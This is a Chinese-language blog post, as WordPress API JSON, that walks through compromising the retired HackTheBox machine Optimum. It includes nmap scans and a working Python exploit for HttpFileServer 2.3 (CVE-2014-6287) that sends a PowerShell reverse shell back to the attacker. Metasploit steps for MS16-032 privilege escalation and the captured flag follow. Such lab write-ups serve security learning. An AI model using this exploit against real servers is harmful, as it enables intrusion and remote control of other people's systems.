{"id":169,"date":"2024-11-13T10:46:12","date_gmt":"2024-11-13T02:46:12","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=169"},"modified":"2024-11-13T10:46:13","modified_gmt":"2024-11-13T02:46:13","slug":"169","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/169\/","title":{"rendered":"HTB\u9776\u673a Optimum \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.8<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.8 (10.10.10.8) 56(84) bytes of data.\n64 bytes from 10.10.10.8: icmp_seq=1 ttl=127 time=1442 ms\n64 bytes from 10.10.10.8: icmp_seq=2 ttl=127 time=425 ms\n64 bytes from 10.10.10.8: icmp_seq=3 ttl=127 time=108 ms\n64 bytes from 10.10.10.8: icmp_seq=4 ttl=127 time=125 ms\n\n--- 10.10.10.8 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3287ms\nrtt min\/avg\/max\/mdev = 107.939\/524.919\/1441.916\/544.217 ms, pipe 2<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Sep 18 08:42:20 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.8\nNmap scan report for 10.10.10.8 (10.10.10.8)\nHost is up (0.28s latency).\nAll 65535 scanned ports on 10.10.10.8 (10.10.10.8) are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Wed Sep 18 08:43:32 2024 -- 1 IP address (1 host up) scanned in 71.40 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\uff0c\u76f4\u63a5\u8fdb\u884c<code>TCP<\/code>\u5168\u7aef\u53e3\u626b\u63cf\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Sep 18 08:47:06 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.8\nNmap scan report for 10.10.10.8 (10.10.10.8)\nHost is up (0.11s latency).\nNot shown: 65534 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    HttpFileServer httpd 2.3\n|_http-title: HFS \/\n|_http-server-header: HFS 2.3\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone\nRunning (JUST GUESSING): Microsoft Windows 2012|8|Phone (89%)\nOS CPE: cpe:\/o:microsoft:windows_server_2012 cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows\nAggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   107.24 ms 10.10.14.1 (10.10.14.1)\n2   107.97 ms 10.10.10.8 (10.10.10.8)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Wed Sep 18 08:48:32 2024 -- 1 IP address (1 host up) scanned in 86.56 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Sep 18 08:52:51 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.8\nNmap scan report for 10.10.10.8 (10.10.10.8)\nHost is up (0.11s latency).\nAll 65535 scanned ports on 10.10.10.8 (10.10.10.8) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Wed Sep 18 08:53:58 2024 -- 1 IP address (1 host up) scanned in 66.86 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u7591\u4f3c\u4e3a<code>Windows Server 2012<\/code>\u3002<\/p>\n<hr \/>\n<h1>Web\u670d\u52a1\u63a2\u6d4b<\/h1>\n<p>\u6839\u636e<code>Nmap<\/code>\u7684\u626b\u63cf\u7ed3\u679c\u67e5\u627e\u6f0f\u6d1e\uff0c\u53d1\u73b0\u9776\u673a<code>HTTP<\/code>\u670d\u52a1\u8f6f\u4ef6\u4e3a<code>HttpFileServer v2.3<\/code>\uff0c\u5b58\u5728\u4e25\u91cd\u7684\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2014-6287<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726621477132-c944409d-eaf9-4511-84e2-fe72290854bc.png\" alt=\"\" \/><\/p>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/optimum.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726621724414-718c6025-890a-48ee-a015-d99ccd437d80.png\" alt=\"\" \/><\/p>\n<p>\u672a\u5728<code>HFS<\/code>\u5185\u53d1\u73b0\u4efb\u4f55\u5171\u4eab\u6587\u4ef6\uff0c\u76f4\u63a5\u4f7f\u7528\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u8fdb\u884c\u6e17\u900f\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<p>\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e<code>EXP<\/code>\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-python\">#! \/usr\/bin\/python3\nimport base64\nimport time\nimport sys\nimport requests\n\nhost=input(\"Enter the base url of the target (http:\/\/target.com\/)n\")\nlhost= input(\"Your LHOST:\")\nlport= input(\"Your LPORT:\")\n\nreq = requests.get(host)\nstatus = req.status_code\nprint(f\"\"\"\nTargets Status code is {status}\n--------------------------------------\nTarget     : {host}\nLHOST      : {lhost}\nLPORT      : {lport}\n--------------------------------------\n\"\"\")\nchoose = input(\"Is this correct? [y\/n]:\")\nif choose == \"y\" or choose == \"Y\":\n    raw_payload='$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"&gt; \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'\n    raw_payload = raw_payload % (lhost,int(lport))\n    encrypted_payload = base64.b64encode(raw_payload.encode(\"utf16\")[2:]).decode()\n    if host[-1] == '\/':\n        pass\n    else:\n        host=host+'\/'\n    infected_url = host+\"?search=%%00{.exec|C:WindowsSystem32WindowsPowerShell\\v1.0powershell.exe+-e+%s.}\"\n    infected_url = infected_url % (encrypted_payload)\n    print(f'nnOpen a new terminal and execute \"nc -lnvp {lport}\"')\n    time.sleep(2)\n    choose2 = input(\"nnDid you start you listener? [y\/n]\")\n    if choose2 == 'y' or choose2 =='Y':\n        exploit = requests.get(infected_url)\n    else:\n        print(\"Start your listener and try again..\")\n        time.sleep(0.5)\n        sys.exit()\nelse:\n    print(\"Exiting..\")\n    time.sleep(0.5)\n    sys.exit()<\/code><\/pre>\n<p>\u9996\u5148\u542f\u52a8<code>Metasploit<\/code>\uff0c\u4f7f\u7528<code>payload\/windows\/powershell_reverse_tcp<\/code>\u4f5c\u4e3a\u76d1\u542c\u5668\u6a21\u5757\uff1a<\/p>\n<pre><code class=\"language-shell\">use exploit\/multi\/handler\nset payload payload\/windows\/powershell_reverse_tcp\nset LHOST 10.10.14.7\nset LPORT 443\nrun<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726624129247-0142d2ec-cef0-4ae8-a3fc-6cba652070df.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u76f4\u63a5\u6267\u884c<code>EXP<\/code>\uff0c\u8f93\u5165\u7f51\u5740\u3001\u653b\u51fb\u673a<code>IP<\/code>\u548c\u7aef\u53e3\u53f7\uff1a<\/p>\n<pre><code class=\"language-shell\">echo -e \"http:\/\/optimum.htb\/n10.10.14.7n443nyny\" | .\/exp.py<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726624387372-6856766a-85ff-407c-b0ee-38b6e7306c25.png\" alt=\"\" \/><\/p>\n<p><strong>\u53cd\u5f39Shell\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u5185\u6838\u6f0f\u6d1e\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u8fdb\u5165\u7cfb\u7edf\u4e4b\u540e\uff0c\u9996\u5148\u4f7f\u7528<code>post\/multi\/recon\/local_exploit_suggester<\/code>\u6a21\u5757\u641c\u7d22\u9776\u673a\u5185\u6838\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-shell\">use post\/multi\/recon\/local_exploit_suggester\nset SESSION 1\nrun<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726638475244-88edada5-b68a-406a-8494-a3c7b5635385.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u5927\u91cf\u6f0f\u6d1e\uff01\u51b3\u5b9a\u4f7f\u7528<code>MS16-032<\/code>\u6f0f\u6d1e\uff08\u7f16\u53f7\u4e3a<code>8<\/code>\uff09\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-shell\">use exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc\nset SESSION 1\nset LHOST 10.10.10.8\nset LPORT 53\nrun<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726638644647-56dc8991-b771-4498-a6b4-b065b70b8b31.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<pre><code class=\"language-plain\">6e07f8e063d1a0f7dfc14e7733ec6d27<\/code><\/pre>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.8 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.8 (10.10.10.8) 56( &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-169","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=169"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/169\/revisions"}],"predecessor-version":[{"id":170,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/169\/revisions\/170"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}